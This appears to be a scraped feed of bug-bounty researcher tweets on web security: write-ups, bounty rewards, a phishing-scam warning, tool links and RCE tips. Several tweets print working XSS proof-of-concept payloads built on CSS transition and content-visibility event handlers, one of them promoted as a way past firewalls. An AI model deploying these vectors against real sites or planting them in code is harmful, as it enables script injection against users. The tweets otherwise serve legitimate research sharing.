New Write-up!. Achieving Remote code execution by exploiting variable check feature!.

RT @Yass1nMohamed: I made a list of all my weird XSS Payloads so you all can just copy and paste it 🖤. #CyberSecur….

What do you want to know?.

RT @DarkWebInformer: WPProbe: A fast and stealthy WordPress plugin enumeration tool. GitHub: • Uses REST API to de….

RT @cyb_detective: Filesec. Encyclopedia of file extensions. For each file, it indicates the types of attacks and platforms for which this….

A script written in python just to check the existence of a CVE-2025-0133 Reflected Cross-Site Scripting vulnerability that occurs in Palo Alto. The endpoint 'getconfig.esp' is detected and tested for XSS using the given script. Github:

RT @harris0ft: I have had 8/10 success in Rate Limiting Bypass for sometime now.

Always check for leaked JWTs for internal APIs. This can result in unauthorised access to APIs that return mass PII. In this case, the API leaked PII of 2637711 users. Bounty: $1000.@yeswehack

Just got a reward for a critical vulnerability submitted on @yeswehack -- Improper Access Control - Generic (CWE-284). #YesWeRHackers

Synack Challenge Coins!.@synack @SynackRedTeam

New XSS Vector alert!. <style>.xss:hover {.transition: transform 0.1s;.transform: translateX(1px);.}.</style>. 1. <xss ontransitionend="alert(document.domain)">.2. <xss ontransitionstart="alert(document.domain)">.3. <xss ontransitionrun="alert(document.domain)">.

New XSS Vector alert!.POC: 1. <xss ontransitionend="alert(document.domain)">.2. <xss ontransitionstart="alert(document.domain)">.3. <xss ontransitionrun="alert(document.domain)">. See thread. #XSS #Cheatsheet #vector

New XSS vector alert!. <input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>. Works on Chrome, No interaction required. Most firewalls don't filter this event handler. #XSS #Bypass #Cheatsheet.

!! SCAM ALERT !!.Many people from my friends circle have received the following messages which states a failed delivery. Upon accessing the shortened URL a fake Pakistan Post website ending in *.xyz or *.cyou. The fake phishing websites asks for updated address and on the next

RT @coffinxp7: Effective way to crawl juicy endpoints with Katana 😎🤏🏻.happy hunting :)

I just completed the "Dojo #31 - Coffee shop" challenge on @YesWeHack! 🚀. Can you do it?: #ChallengeCompleted #YesWeRHackers #YesWeHackDojo.

RT @joaxcar: Did a little writeup of the CSP bypass I reported to PortSwigger. It might be interesting to anyone who saw the disclosed repo….

Amazing write-up by @ozgur_bbh .

RT @hackstacksec: Here are the OWASP Top 10 vulnerabilities for Large language model 🚨. Get your organisation secured..

RT @ynsmroztas: If you get a reverse shell on Ubuntu 18.04.x or can run remote code execution, you should definitely try this exploit on th….

RT @0day_exploit_: TOP RCE ( Remote code execution ). Thread 🧵:👇 Here is how to find RCE issues:. 1) We can find RCE from EXIF metadata im….